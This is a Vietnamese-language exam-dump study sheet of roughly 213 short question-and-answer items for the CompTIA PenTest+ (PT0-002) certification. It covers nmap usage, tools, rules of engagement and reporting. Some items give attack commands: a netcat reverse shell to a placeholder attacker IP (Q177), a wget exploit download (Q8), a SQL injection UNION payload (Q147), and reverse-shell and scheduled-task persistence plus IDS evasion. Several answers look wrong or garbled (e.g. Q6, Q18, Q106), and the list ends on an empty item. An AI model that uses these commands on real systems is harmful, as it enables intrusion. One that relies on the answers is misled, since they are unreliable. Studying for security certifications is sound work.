
Tổng Quan Về CompTIA Pentest+ (PT0-002) Practice Test (DUMP)
Share
Đây là những ý chính từ tài liệu ôn thi, giúp các bạn nhanh chóng nắm những điểm quan trong của bài thi. CompTIA Pentest + (PT0-002) Sau khi đọc hãy quay lại các câu hỏi và cuối cùng là làm Exam Simulation với Test Engine.
Câu 1:
Hỏi: Lệnh nào cho phép file script.sh được thực thi bởi người sở hữu?
Đáp án: chmod u+x script.sh
.
Câu 2:
Hỏi: Một tester dùng lệnh để xóa lịch sử Bash. Họ đang làm gì?
Đáp án: Xóa dấu vết bằng cách xóa lịch sử Bash.
Câu 3:
Hỏi: Bài kiểm tra bảo mật dựa trên tuân thủ tập trung vào điều gì?
Đáp án: Xác định hiệu quả của một bộ tiêu chuẩn bảo mật cụ thể.
Câu 4:
Hỏi: Lợi ích lớn nhất của MITRE ATT&CK Framework?
Đáp án: Hiểu chiến thuật xâm nhập để ngăn chặn chúng.
Câu 5:
Hỏi: OWASP Top 10 mô tả điều gì? (Chọn 2)
Đáp án:
- Rủi ro nghiêm trọng nhất của ứng dụng web.
- Các rủi ro được xếp hạng theo mức độ quan trọng.
Câu 6:
Hỏi: Cách khai thác tốt nhất từ lỗ hổng upload path?
Đáp án: Chỉnh sửa file smb.conf
và upload lại lên server.
Câu 7:
Hỏi: Khi kiểm tra dữ liệu trên cloud, điều gì cần kiểm tra đầu tiên?
Đáp án: Dữ liệu nhạy cảm có công khai hay không.
Câu 8:
Hỏi: Cách tải file exploit từ máy chủ staging?
Đáp án: wget 10.10.51.50:9891/exploit
.
Câu 9:
Hỏi: Sau khi sử dụng exploit, cần làm gì?
Đáp án: Xóa file /tmp/apache
.
Câu 10:
Hỏi: Báo cáo kiểm tra tĩnh nên chứa gì?
Đáp án: Ngữ cảnh mã liên quan đến các thao tác typecasting không an toàn.
Câu 11:
Hỏi: Remediate lỗ hổng cao nhất liên quan đến certificate?
Đáp án:
- Tạo CSR.
- Gửi CSR đến CA và cài đặt lại certificate mới.
Câu 12:
Hỏi: Công cụ nào để đánh giá nhận thức bảo mật của nhân viên?
Đáp án: SET
.
Câu 13:
Hỏi: Lỗ hổng phổ biến nhất của thiết bị IoT?
Đáp án: Mật khẩu mặc định.
Câu 14:
Hỏi: Lệnh sdelete mimikatz.*
làm gì?
Đáp án: Xóa các công cụ khỏi server.
Câu 15:
Hỏi: Nmap command tốt nhất để tìm các port dễ bị khai thác?
Đáp án: nmap 192.168.1.1-5 -PS22-25,80
.
Câu 16:
Hỏi: Tại sao URL không trả về kết quả như mong đợi?
Đáp án: URI trả về lỗi server.
Câu 17:
Hỏi: Sinkholing IP của tester, nguyên nhân?
Đáp án: Quá trình lập kế hoạch không thông báo đầy đủ các nhóm.
Câu 18:
Hỏi: WPScan và SQLmap được dùng để làm gì?
Đáp án: Xác định tất cả các lỗ hổng trong hệ thống.
Câu 19:
Hỏi: Tìm danh bạ nhân viên từ bản sao cũ?
Đáp án: Web archive.
Câu 20:
Hỏi: Cách xác định CVE liên quan đến SSH trên server Linux?
Đáp án: nmap --script vulners
.
Câu 21:
Hỏi: Cách tốt nhất để đảm bảo lỗ hổng là true positive?
Đáp án: Thực hiện kiểm tra thủ công trên server.
Câu 22:
Hỏi: Kỹ thuật nào có khả năng thành công cao nhất để truy cập hệ thống tài chính?
Đáp án: Thực hiện spear phishing giả mạo quản lý cấp cao.
Câu 23:
Hỏi: Yếu điểm nào của WiFi dễ bị brute-force nhất?
Đáp án: WPS.
Câu 24:
Hỏi: Script được viết để làm gì?
Đáp án: Xác định các host hoạt động trên mạng.
Câu 25:
Hỏi: Sau khi hoàn thành báo cáo, cần làm gì?
Đáp án: Xóa thông tin đăng nhập được tạo bởi tester.
Câu 26:
Hỏi: Công cụ nào phù hợp để tạo phản hồi truy vấn DNS tùy chỉnh?
Đáp án: Scapy
.
Câu 27:
Hỏi: Bài kiểm tra với thông tin công khai thuộc loại nào?
Đáp án: Kiểm tra môi trường không xác định.
Câu 28:
Hỏi: Dòng nào trong mã Python dẫn đến cảnh báo IDS "probable port scan"?
Đáp án: Dòng 08.
Câu 29:
Hỏi: Điều gì cần có trong ROE?
Đáp án: Hạn chế kiểm tra.
Câu 30:
Hỏi: Điều quan trọng nhất cần xác định đầu tiên khi khách hàng không muốn báo cáo hàng ngày?
Đáp án: Ngưỡng rủi ro để thông báo ngay.
Câu 31:
Hỏi: Module nào trong Pacu để xác định quyền của user?
Đáp án: iam_enum_permissions
.
Câu 32:
Hỏi: Làm gì khi hệ thống báo động được kích hoạt trong bài kiểm tra?
Đáp án: Deconflict với penetration tester.
Câu 33:
Hỏi: Công cụ nào phù hợp để thực hiện reconnaissance với camera an ninh?
Đáp án: Shodan.
Câu 34:
Hỏi: Responder được dùng để thu thập gì?
Đáp án: Hash của người dùng gửi qua SMB.
Câu 35:
Hỏi: Công cụ nào phù hợp để redirect scanning tools qua TCP port 1080?
Đáp án: ProxyChains.
Câu 36:
Hỏi: Làm gì khi phát hiện lỗ hổng nghiêm trọng đang bị khai thác?
Đáp án: Liên hệ ngay với đầu mối liên lạc chính.
Câu 37:
Hỏi: Công cụ mở file .pcap
để xem thông tin xác thực?
Đáp án: Wireshark.
Câu 38:
Hỏi: Tại sao tất cả port bị lọc trong lần quét thứ hai của Nmap?
Đáp án: Firewall hoặc IPS đã chặn quá trình quét.
Câu 39:
Hỏi: Phương pháp tốt nhất để kiểm tra dịch vụ TCP chuyên biệt có thể mở cửa vật lý?
Đáp án: Viết script Lua sử dụng với NSE.
Câu 40:
Hỏi: Rủi ro bổ sung khi kiểm tra SCADA?
Đáp án: Thiết bị có thể gây ảnh hưởng đến thế giới vật lý.
Câu 41:
Hỏi: Nmap scan nào phù hợp để tránh báo động và phản ứng?
Đáp án: nmap -sS -O 192.168.1.2/24 -T1
.
Câu 42:
Hỏi: Làm gì khi phát hiện một dải IP không xác định thông qua VPN tunnel?
Đáp án: Ngừng kiểm tra và thông báo với liên hệ khẩn cấp.
Câu 43:
Hỏi: Tester tặng ổ cứng gắn ngoài có chứa mã độc. Đây là kiểu tấn công gì?
Đáp án: Baiting.
Câu 44:
Hỏi: Hành động nào hợp lý khi khai thác lỗ hổng SQL database trong mạng nội bộ?
Đáp án: Khai thác điểm yếu cấu hình trong cơ sở dữ liệu SQL.
Câu 45:
Hỏi: Cách khai thác NTLM challenge-response traffic?
Đáp án: Sử dụng tấn công pass-the-hash.
Câu 46:
Hỏi: Tài liệu nào mô tả hoạt động, kết quả và lịch trình cho tester?
Đáp án: SOW (Statement of Work).
Câu 47:
Hỏi: Công cụ tốt nhất để kiểm tra sâu một trang web?
Đáp án: WPScan.
Câu 48:
Hỏi: Hoàn thiện script để thực hiện port scanning trong mạng?
Đáp án:
-
Lệnh scan:
nmap 192.168.2.2 -sV -O
. - Vấn đề cần kiểm tra: Quyền SMB yếu.
Câu 49:
Hỏi: Tester tìm thấy file chứa mật khẩu rõ. Hành động tiếp theo?
Đáp án: Ghi nhận trong báo cáo kiểm tra.
Câu 50:
Hỏi: Đầu script Bash nên dùng ký tự gì để chỉ định trình thông dịch?
Đáp án: #!
.
Câu 51:
Hỏi: Kỹ thuật nào để gửi traffic với double tagging?
Đáp án: Tag nesting.
Câu 52:
Hỏi: Cách sửa script Python để kiểm tra user context của server?
Đáp án: Chèn lệnh id;whoami
vào script.
Câu 53:
Hỏi: Công cụ reconnaissance thụ động nào phù hợp? (Chọn 2)
Đáp án:
- Wireshark.
- Shodan.
Câu 54:
Hỏi: Lệnh Nmap nào ít khả năng bị IDS phát hiện?
Đáp án: nmap -f --badsum 192.168.1.10
.
Câu 55:
Hỏi: Làm gì để ép các thiết bị kết nối với rogue AP?
Đáp án: Gửi deauthentication frames.
Câu 56:
Hỏi: Sử dụng port scan kết quả từ Nmap, xác định vector tấn công?
Đáp án: Quyền SMB yếu.
Câu 57:
Hỏi: Phương pháp bảo mật email với tính bảo mật khi truyền tải?
Đáp án: S/MIME.
Câu 58:
Hỏi: Khuyến nghị nào khi mật khẩu bị crack dễ dàng bằng rainbow table?
Đáp án: Yêu cầu thuật toán mạnh hơn.
Câu 59:
Hỏi: Công cụ tốt nhất để kiểm tra URL có lỗ hổng SQL?
Đáp án: SQLmap.
Câu 60:
Hỏi: Cách Nmap thực hiện ping scan nhanh?
Đáp án: nmap -sn 10.12.1.0/24
.
Câu 61:
Hỏi: Công cụ tốt nhất để thu thập thông tin IoT trong reconnaissance thụ động?
Đáp án: Shodan.
Câu 62:
Hỏi: Điều cần kiểm tra đầu tiên khi làm penetration test trên môi trường cloud?
Đáp án: Xác minh nhà cung cấp cloud cho phép kiểm tra.
Câu 63:
Hỏi: Phân tích HTTP payload để xác định loại tấn công và cách khắc phục?
Đáp án: Tùy thuộc loại tấn công được chỉ ra trong payload.
Câu 64:
Hỏi: Công cụ dùng sau lệnh unshadow
để crack mật khẩu?
Đáp án: John the Ripper.
Câu 65:
Hỏi: File nào từ kết quả dirb
có khả năng chứa thông tin hữu ích nhất?
Đáp án: File about
.
Câu 66:
Hỏi: Công cụ tốt nhất để thiết lập rogue AP trên mạng?
Đáp án: Aircrack-ng.
Câu 67:
Hỏi: Cách duy trì quyền truy cập trên Windows workstation?
Đáp án: Tạo scheduled task chạy tệp độc hại khi khởi động.
Câu 68:
Hỏi: Điều hợp lý nhất khi kiểm tra SCADA trong mạng nội bộ?
Đáp án: Controllers không xác minh nguồn gốc lệnh.
Câu 69:
Hỏi: Làm cách nào kiểm tra ứng dụng Java có sử dụng mã hóa trên socket?
Đáp án: Chạy Wireshark để bắt gói tin và quan sát.
Câu 70:
Hỏi: Tại sao cần quy định thời gian phù hợp khi lập kế hoạch kiểm tra?
Đáp án: Tránh gây ảnh hưởng đến hoạt động mạng và kinh doanh.
Câu 71:
Hỏi: Điều cần tránh khi kiểm tra ứng dụng trên môi trường shared cloud?
Đáp án: Gửi nhiều request mỗi giây để kiểm tra DDoS protection.
Câu 72:
Hỏi: Tester cần xóa gì sau khi kết thúc bài kiểm tra? (Chọn 2)
Đáp án:
- Shell được tạo ra.
- Tài khoản được tạo bởi tester.
Câu 73:
Hỏi: Fuzzing trên phần mềm thường tìm thấy loại lỗ hổng nào?
Đáp án: Buffer overflow.
Câu 74:
Hỏi: Email phishing nhắm mục tiêu sử dụng yếu tố nào để tăng hiệu quả?
Đáp án: Quyền lực và tính khẩn cấp.
Câu 75:
Hỏi: Thay đổi giá trị id
trong URL để truy cập ứng dụng là lỗ hổng gì?
Đáp án: Direct object reference.
Câu 76:
Hỏi: Khi nào cần xác thực lại bài kiểm tra bảo mật trước đó?
Đáp án: Sau khi phát hiện một vụ vi phạm.
Câu 77:
Hỏi: Tester đang thực hiện gì khi chạy các lệnh tạo chia sẻ trên remote? (Chọn 2)
Đáp án:
- Tạo chia sẻ trên hệ thống từ xa.
- Thực thi file trên hệ thống từ xa.
Câu 78:
Hỏi: Tại sao PowerShell không kết nối RDP khi quét Nmap thấy mở port?
Đáp án: Địa chỉ IP không chính xác.
Câu 79:
Hỏi: Loại kiểm tra nào có khả năng gây hại cho môi trường ICS?
Đáp án: Active scanning.
Câu 80:
Hỏi: Tấn công Bluesnarfing thường thực hiện điều gì?
Đáp án: Dump sổ địa chỉ của thiết bị.
Câu 81:
Hỏi: Sau khi báo cáo kết quả kiểm tra, bước tiếp theo là gì?
Đáp án: Attestation of findings và gửi báo cáo.
Câu 82:
Hỏi: Tester phát hiện backdoor đã tồn tại trong server. Làm gì tiếp theo?
Đáp án: Thông báo ngay với khách hàng.
Câu 83:
Hỏi: Đội hunt team quan tâm điều gì nhất trong báo cáo cuối cùng?
Đáp án: Tactics, Techniques, and Procedures (TTPs).
Câu 84:
Hỏi: Điều gì cần xem xét trước khi quét OS và port scan trên hệ thống cũ?
Đáp án: Kiểm kê tài sản và phiên bản hiện có.
Câu 85:
Hỏi: Công cụ khai thác nào có bộ module payload rộng nhất?
Đáp án: Metasploit.
Câu 86:
Hỏi: Công cụ nào dễ dàng thao tác header TCP để kiểm tra phản hồi?
Đáp án: Scapy.
Câu 87:
Hỏi: Tester phát hiện malware trong ứng dụng được kiểm tra. Làm gì tiếp theo?
Đáp án: Dừng bài kiểm tra và thông báo với liên hệ khẩn cấp.
Câu 88:
Hỏi: Tấn công nào có thể được thực hiện khi ICMP bị vô hiệu hóa?
Đáp án: Fraggle.
Câu 89:
Hỏi: Script đang thực hiện gì?
Đáp án: Quét mạng để tìm cổng mở cụ thể.
Câu 90:
Hỏi: Công cụ nào kiểm tra lỗ hổng dựa trên kết quả quét Nmap?
Đáp án: OpenVAS.
Câu 91:
Hỏi: Lệnh nào tiếp theo tốt nhất để tiến sâu vào mạng từ CentOS bị khai thác?
Đáp án: nc 127.0.0.1 5555
.
Câu 92:
Hỏi: Dịch vụ nào có khả năng bị khai thác nhiều nhất từ kết quả quét Nmap? (Chọn 2)
Đáp án:
- HTTP.
- DNS.
Câu 93:
Hỏi: Các biểu thức Python nào tăng giá trị biến val
lên 1? (Chọn 2)
Đáp án:
-
val=(val+1)
. -
val+=1
.
Câu 94:
Hỏi: Lệnh Nmap nào có khả năng ít bị phát hiện nhất?
Đáp án: nmap -T0 192.168.0.1
.
Câu 95:
Hỏi: Script đang thực hiện hành động gì?
Đáp án: Tìm cổng mở.
Câu 96:
Hỏi: Sau khi báo cáo kết quả với khách hàng, bước tiếp theo là gì?
Đáp án: Khắc phục các lỗ hổng được báo cáo.
Câu 97:
Hỏi: Khi nào cần thông báo khẩn cấp với khách hàng?
Đáp án: Phát hiện kẻ tấn công khác trong mạng.
Câu 98:
Hỏi: Kỹ thuật tốt nhất để xác định plaintext từ một danh sách string mã hóa?
Đáp án: Rainbow table attack.
Câu 99:
Hỏi: Tại sao script Python lại kích hoạt cảnh báo "probable port scan"?
Đáp án: Dòng *range(1, 1025)
tạo danh sách port theo thứ tự số.
Câu 100:
Hỏi: Điều gì quan trọng nhất khi kiểm tra xâm nhập vào văn phòng ngoài giờ? (Chọn 2)
Đáp án:
- Liên hệ chính của khách hàng.
- Tài liệu liên quan đến phạm vi kiểm tra.
Câu 101:
Hỏi: Hệ điều hành nào phù hợp nhất với kết quả scan từ Nmap?
Đáp án: Windows Server.
Câu 102:
Hỏi: Cách tốt nhất để lấy thông tin đăng nhập FTP trong một on-path attack?
Đáp án: Sử dụng Wireshark để bắt traffic.
Câu 103:
Hỏi: Ghép nối các giá trị chuỗi được gọi là gì?
Đáp án: Concatenation.
Câu 104:
Hỏi: Nguyên nhân nào khả thi nhất khi ARP cache bị poison?
Đáp án: Thiết bị trên mạng đã poison ARP cache.
Câu 105:
Hỏi: Rủi ro nào nằm trong OWASP Top 10 2017? (Chọn 2)
Đáp án:
- Cross-site scripting (XSS).
- Injection flaws.
Câu 106:
Hỏi: Thiết bị nào có khả năng là gateway với dịch vụ quản lý in-band?
Đáp án: Gateway có dịch vụ quản lý in-band.
Câu 107:
Hỏi: Yếu tố nào quan trọng nhất cần làm rõ trước khi bắt đầu kiểm tra?
Đáp án: Statement of Work (SOW).
Câu 108:
Hỏi: Hành động nào không phù hợp với SOW? (Chọn 2)
Đáp án:
- Không chia sẻ lỗ hổng nghiêm trọng với khách hàng.
- Tìm sự giúp đỡ từ diễn đàn ngầm bằng cách chia sẻ địa chỉ IP công khai.
Câu 109:
Hỏi: Sửa đổi nào cần thiết để script Perl hoạt động đúng?
Đáp án: Xóa dòng 3, 5 và 6.
Câu 110:
Hỏi: Công cụ nào tốt nhất để khai thác script PHP bị phát hiện?
Đáp án: Netcat và cURL.
Câu 111:
Hỏi: Cách duy trì quyền truy cập root trên server Linux sau reboot?
Đáp án: Tạo one-shot system service để thiết lập reverse shell.
Câu 112:
Hỏi: Lệnh nào giải mã nội dung file Base64?
Đáp án: echo U3VQZXIkM2NyZXQhCg== | base64 -d
.
Câu 113:
Hỏi: Điều gì tốt nhất để xác định hệ thống trước khi kiểm tra?
Đáp án: Asset inventory.
Câu 114:
Hỏi: Kỹ thuật reconnaissance thụ động nào hiệu quả nhất?
Đáp án: Scrape web presences và mạng xã hội.
Câu 115:
Hỏi: Điều gì xảy ra khi khách hàng muốn tập trung vào một khu vực mạng cụ thể?
Đáp án: Reprioritizing goals/objectives.
Câu 116:
Hỏi: Công cụ nào tốt nhất để kiểm tra ứng dụng web thủ công? (Chọn 2)
Đáp án:
- OWASP ZAP.
- Burp Suite.
Câu 117:
Hỏi: Điều gì có thể xảy ra khi quét mạng ICS?
Đáp án: Gây ra lỗi không mong muốn trong hệ thống điều khiển.
Câu 118:
Hỏi: Framework nào cung cấp ma trận chiến thuật và kỹ thuật của attacker?
Đáp án: MITRE ATT&CK Framework.
Câu 119:
Hỏi: Nmap command nào kiểm tra OS và phiên bản Apache trên server?
Đáp án: nmap -A -T4 -p80 192.168.1.20
.
Câu 120:
Hỏi: Lệnh nào được sử dụng để xác thực tài khoản user trên SMTP server?
Đáp án: VRFY và EXPN.
Câu 121:
Hỏi: Bước đầu tiên để lên kế hoạch reconnaissance với ít thông tin nhất?
Đáp án: Check WHOIS và netblock records của công ty.
Câu 122:
Hỏi: Làm cách nào để trực quan hóa thông tin authorization được truyền tải?
Đáp án: Giải mã header authorization bằng Base64.
Câu 123:
Hỏi: Kỹ thuật nào giúp truy cập tòa nhà bằng cách sao chép thẻ nhân viên?
Đáp án: Badge cloning.
Câu 124:
Hỏi: Công cụ nào dùng để tìm thông tin ẩn trong tài liệu trên web?
Đáp án: FOCA.
Câu 125:
Hỏi: Làm gì tiếp theo khi đã có quyền truy cập email CEO?
Đáp án: Gửi email yêu cầu tạo tài khoản mới.
Câu 126:
Hỏi: Công cụ tốt nhất để kiểm tra lỗ hổng web server?
Đáp án: Nikto.
Câu 127:
Hỏi: Công cụ tốt nhất để thiết lập rogue AP trên mạng?
Đáp án: Aircrack-ng.
Câu 128:
Hỏi: Cách thực hiện Nmap scan tránh kích hoạt báo động?
Đáp án: nmap -sS -O 192.168.1.0/24 -T1
.
Câu 129:
Hỏi: Lý do ứng dụng không chấp nhận chứng chỉ SSL do tester tạo?
Đáp án: Ứng dụng đã cài đặt API certificate pinning.
Câu 130:
Hỏi: Công cụ tốt nhất để khai thác lỗ hổng SQL trên database server?
Đáp án: SQLmap.
Câu 131:
Hỏi: Mối lo ngại lớn nhất với VM khi dùng tài nguyên chung?
Đáp án: Side channel attack.
Câu 132:
Hỏi: Khái niệm nào định nghĩa các bước cụ thể trong bài kiểm tra?
Đáp án: Methodology.
Câu 133:
Hỏi: Cách tốt nhất để đạt cả hai mục tiêu: truy cập thiết bị và trích xuất dữ liệu?
Đáp án: Gửi SMS giả mạo số dịch vụ với link tải ứng dụng độc hại.
Câu 134:
Hỏi: OS nào có khả năng cao nhất trả về gói TTL 128 trong lệnh ping?
Đáp án: Windows.
Câu 135:
Hỏi: Kỹ thuật nào giúp truy cập văn phòng khi không bị chú ý? (Chọn 2)
Đáp án:
- Badge stealing.
- Tailgating.
Câu 136:
Hỏi: Loại tấn công nào được thể hiện qua logs khi nhiều parameter bị thay đổi?
Đáp án: Parameter pollution.
Câu 137:
Hỏi: Điều gì cần thiết trước khi bắt đầu bài kiểm tra khi bị trễ thời gian?
Đáp án: Liên hệ khẩn cấp chính xác của khách hàng.
Câu 138:
Hỏi: Kiểm soát kỹ thuật đầu tiên cần áp dụng cho một thiết bị mạng?
Đáp án: System-hardening techniques.
Câu 139:
Hỏi: Cách nào tốt nhất để thực thi binary trên Windows qua wmic.exe?
Đáp án: PowerShell modules.
Câu 140:
Hỏi: Làm gì khi phát hiện admin exfiltrate dữ liệu công ty?
Đáp án: Escalate vấn đề ngay lập tức.
Câu 141:
Hỏi: Công cụ nào nên được sử dụng đầu tiên để kiểm tra e-commerce application?
Đáp án: OWASP ZAP.
Câu 142:
Hỏi: Tài liệu nào quy định cách quản lý thông tin trước, trong và sau kiểm tra?
Đáp án: NDA.
Câu 143:
Hỏi: Lệnh nào cần thử tiếp theo sau kết quả scan từ Nmap?
Đáp án: ftp 192.168.53.23
.
Câu 144:
Hỏi: Cách lưu kết quả port scan vào file ở định dạng có thể trao đổi?
Đáp án: nmap -A 192.168.0.10-100 -oX results
.
Câu 145:
Hỏi: Phương pháp nào thu thập email mà không kích hoạt công cụ bảo mật? (Chọn 2)
Đáp án:
- Scraping social media sites.
- Using WHOIS lookup tool.
Câu 146:
Hỏi: Tài liệu nào định nghĩa domain, IP ranges, hosts, và applications?
Đáp án: ROE (Rules of Engagement).
Câu 147:
Hỏi: Lệnh nào khai thác lỗ hổng hiển thị lỗi SQL trong web application?
Đáp án: 1 UNION SELECT 1, DATABASE(), 3 --
.
Câu 148:
Hỏi: Cách tốt nhất redirect HTTP connections tới IP giả mạo?
Đáp án: Khai thác DNS server để thêm/ cập nhật bản ghi A giả mạo.
Câu 149:
Hỏi: Báo cáo bảo mật ứng dụng gửi đến developer nên chứa gì? (Chọn 2)
Đáp án:
- Poor input sanitization.
- Null pointer dereferences.
Câu 150:
Hỏi: Công cụ nào kiểm tra nếu mật khẩu người dùng giống nhau trên nhiều hệ thống?
Đáp án: Hydra.
Câu 151:
Hỏi: Khuyến nghị nào cần đưa vào báo cáo sau khi kiểm tra thiết bị mạng? (Chọn 2)
Đáp án:
- Tạo mạng out-of-band cho quản lý.
- Triển khai phương pháp xác thực tốt hơn.
Câu 152:
Hỏi: Tester nên làm gì sau khi kết thúc kiểm tra trên một mục tiêu? (Chọn 2)
Đáp án:
- Xóa mọi công cụ hoặc script đã cài đặt.
- Xóa các tài khoản được tạo ra.
Câu 153:
Hỏi: Vấn đề nào tiềm năng từ kết quả DNS reconnaissance?
Đáp án: Ít nhất một bản ghi nằm ngoài phạm vi kiểm tra.
Câu 154:
Hỏi: Công cụ reconnaissance active tốt nhất để quét port?
Đáp án: Nmap.
Câu 155:
Hỏi: Khi nào cần deconfliction trong penetration test?
Đáp án: Kiểm tra trùng thời gian với cuộc điều tra pháp lý hình sự.
Câu 156:
Hỏi: Công cụ nào tốt nhất để kiểm tra brute-force mật khẩu SSH?
Đáp án: Patator.
Câu 157:
Hỏi: Yêu cầu PCI DSS đối với quá trình kiểm tra bảo mật?
Đáp án: Mạng phải được phân đoạn.
Câu 158:
Hỏi: Sau khi báo cáo và xóa tài khoản tester, điều gì xảy ra tiếp theo?
Đáp án: Khách hàng áp dụng các bản vá lỗ hổng.
Câu 159:
Hỏi: Lệnh nào thực hiện quét nhanh Class C network để xác định host?
Đáp án: nmap -sn 192.168.0.0/24
.
Câu 160:
Hỏi: Công cụ nào hỗ trợ phân tích sâu tệp nhật ký hoặc dữ liệu mạng?
Đáp án: Wireshark.
Câu 161:
Hỏi: Công cụ nào dùng để thực hiện đánh giá phần mềm ứng dụng web?
Đáp án: Burp Suite.
Câu 162:
Hỏi: Lệnh Nmap nào kiểm tra service versions nhanh nhất?
Đáp án: nmap -sV 192.168.1.1
.
Câu 163:
Hỏi: Phương pháp tốt nhất để kiểm tra cấu hình máy chủ SNMP?
Đáp án: Sử dụng công cụ SNMPWalk.
Câu 164:
Hỏi: Công cụ nào kiểm tra và ghi lại lỗ hổng cơ sở dữ liệu NoSQL?
Đáp án: NoSQLMap.
Câu 165:
Hỏi: Tại sao cần kiểm tra lịch sử Bash sau cuộc kiểm tra?
Đáp án: Xóa hoặc bảo mật các lệnh nhạy cảm đã thực thi.
Câu 166:
Hỏi: Phương pháp tốt nhất để kiểm tra tính toàn vẹn của hệ thống file?
Đáp án: Chạy tripwire
.
Câu 167:
Hỏi: Lệnh nào thực hiện kiểm tra ngầm port HTTP/HTTPS?
Đáp án: nmap -p 80,443 -T0
.
Câu 168:
Hỏi: Điều gì cần làm sau khi phát hiện dịch vụ FTP dùng mật khẩu mặc định?
Đáp án: Đưa vào báo cáo và khuyến nghị vô hiệu hóa hoặc thay đổi mật khẩu.
Câu 169:
Hỏi: Công cụ nào dùng để mô phỏng tấn công brute-force qua HTTP form?
Đáp án: Burp Suite Intruder.
Câu 170:
Hỏi: Tấn công nào khai thác việc không kiểm tra xác thực đầu vào?
Đáp án: SQL Injection.
Câu 171:
Hỏi: Lệnh nào ghi kết quả quét Nmap vào file định dạng JSON?
Đáp án: nmap -oJ results.json 192.168.0.1
.
Câu 172:
Hỏi: Công cụ nào được dùng để kiểm tra sức mạnh của chứng chỉ SSL?
Đáp án: SSL Labs.
Câu 173:
Hỏi: Điều gì cần làm trước khi bắt đầu kiểm tra ứng dụng trên cloud?
Đáp án: Xác nhận phạm vi và sự cho phép của nhà cung cấp cloud.
Câu 174:
Hỏi: Phương pháp nào kiểm tra tính bảo mật của SSH trên hệ thống?
Đáp án: Chạy ssh-audit
.
Câu 175:
Hỏi: Lệnh nào phát hiện thông tin phiên bản dịch vụ trên cổng TCP?
Đáp án: nmap -sV -p <port>
.
Câu 176:
Hỏi: Cách nào phân tích lưu lượng HTTP để xác định mã độc?
Đáp án: Sử dụng Wireshark với bộ lọc http
.
Câu 177:
Hỏi: Lệnh nào tạo reverse shell trên Windows?
Đáp án: nc -e cmd.exe <attacker_IP> <port>
.
Câu 178:
Hỏi: Làm gì khi phát hiện credential leak qua HTTP header?
Đáp án: Thông báo cho khách hàng và đề xuất mã hóa thông qua HTTPS.
Câu 179:
Hỏi: Công cụ nào được dùng để đánh giá giao thức SMB?
Đáp án: SMBClient.
Câu 180:
Hỏi: Phương pháp nào kiểm tra cấu hình DNS của hệ thống?
Đáp án: Sử dụng dig
và kiểm tra các bản ghi.
Câu 181:
Hỏi: Lệnh nào trong Nmap quét toàn bộ dải port TCP?
Đáp án: nmap -p- 192.168.0.1
.
Câu 182:
Hỏi: Tại sao cần phân tích log hệ thống sau khi kiểm tra?
Đáp án: Xác định và ghi nhận các hoạt động bất thường.
Câu 183:
Hỏi: Công cụ nào tốt nhất để phân tích nội dung file .har
?
Đáp án: Burp Suite.
Câu 184:
Hỏi: Tấn công nào khai thác lỗi xử lý input từ người dùng?
Đáp án: Command Injection.
Câu 185:
Hỏi: Lệnh nào giúp kiểm tra dịch vụ DNS đang hoạt động?
Đáp án: nslookup
hoặc dig
.
Câu 186:
Hỏi: Phương pháp tốt nhất để kiểm tra dịch vụ RDP có bảo mật?
Đáp án: Chạy kiểm tra với rdp-sec-check
.
Câu 187:
Hỏi: Công cụ nào dùng để tấn công brute-force trên web form?
Đáp án: Hydra.
Câu 188:
Hỏi: Phương pháp nào tốt nhất để phân tích file log tấn công mạng?
Đáp án: Splunk hoặc ELK stack.
Câu 189:
Hỏi: Tại sao cần xác nhận thông tin đăng nhập trước khi kiểm tra?
Đáp án: Đảm bảo quyền truy cập và tính hợp lệ của kiểm tra.
Câu 190:
Hỏi: Công cụ nào dùng để phân tích và kiểm tra lỗ hổng NoSQL?
Đáp án: NoSQLMap.
Câu 191:
Hỏi: Phương pháp tốt nhất để phân tích sự cố mạng nội bộ?
Đáp án: Wireshark với các bộ lọc tương ứng.
Câu 192:
Hỏi: Lệnh nào kiểm tra giao thức HTTP/2 trên server?
Đáp án: curl -I --http2 <server>
.
Câu 193:
Hỏi: Công cụ nào phù hợp nhất để kiểm tra tính toàn vẹn của hệ thống?
Đáp án: Tripwire.
Câu 194:
Hỏi: Kỹ thuật nào khai thác việc sử dụng mật khẩu mặc định?
Đáp án: Password Spraying.
Câu 195:
Hỏi: Phương pháp nào phân tích yêu cầu HTTP độc hại?
Đáp án: Sử dụng Burp Suite.
Câu 196:
Hỏi: Làm thế nào để kiểm tra dịch vụ NTP?
Đáp án: ntpq -p
.
Câu 197:
Hỏi: Công cụ nào phù hợp để thực hiện phishing simulation?
Đáp án: Social-Engineer Toolkit (SET).
Câu 198:
Hỏi: Công cụ nào phù hợp để kiểm tra lưu lượng DNS?
Đáp án: Wireshark với bộ lọc dns
.
Câu 199:
Hỏi: Kỹ thuật nào tốt nhất để kiểm tra hash mật khẩu?
Đáp án: John the Ripper.
Câu 200:
Hỏi: Lệnh nào kiểm tra máy chủ có mở giao thức SNMP?
Đáp án: nmap -sU -p 161 <IP>
.
Câu 201:
Hỏi: Công cụ nào được dùng để kiểm tra giao thức SMTP?
Đáp án: Telnet hoặc Nmap.
Câu 202:
Hỏi: Phương pháp tốt nhất để kiểm tra các bản ghi MX của DNS?
Đáp án: Sử dụng dig mx <domain>
.
Câu 203:
Hỏi: Công cụ nào phù hợp để kiểm tra cấu hình TLS?
Đáp án: SSL Labs hoặc OpenSSL.
Câu 204:
Hỏi: Tấn công nào khai thác lỗ hổng XSS?
Đáp án: Chèn mã JavaScript độc hại vào input form.
Câu 205:
Hỏi: Làm thế nào để phát hiện dịch vụ SNMP với thông tin cấu hình yếu?
Đáp án: Chạy snmpwalk
hoặc snmp-check
.
Câu 206:
Hỏi: Công cụ nào để thực hiện kiểm tra lỗ hổng bảo mật qua API?
Đáp án: Postman hoặc Burp Suite.
Câu 207:
Hỏi: Phương pháp tốt nhất để kiểm tra tính bảo mật của giao thức SSH?
Đáp án: Chạy ssh-audit
.
Câu 208:
Hỏi: Tấn công nào khai thác việc lưu mật khẩu trong cookies?
Đáp án: Cookie Hijacking.
Câu 209:
Hỏi: Lệnh nào kiểm tra port UDP đang hoạt động?
Đáp án: nmap -sU <IP>
.
Câu 210:
Hỏi: Công cụ nào phù hợp để thực hiện kiểm tra và phát hiện giao thức IPv6?
Đáp án: Nmap hoặc Wireshark.
Câu 211:
Hỏi: Lệnh nào kiểm tra kết nối LDAP trên server?
Đáp án: ldapsearch
hoặc nmap -p 389 <IP>
.
Câu 212:
Hỏi: Công cụ nào phù hợp để kiểm tra DNS zone transfer?
Đáp án: Dig hoặc Nslookup.
Câu 213:
Hỏi: Lệnh nào kiểm tra phiên bản cụ thể của MySQL?
Đáp án: mysql -V
hoặc nmap -sV -p 3306 <IP>
.
Câu 214:
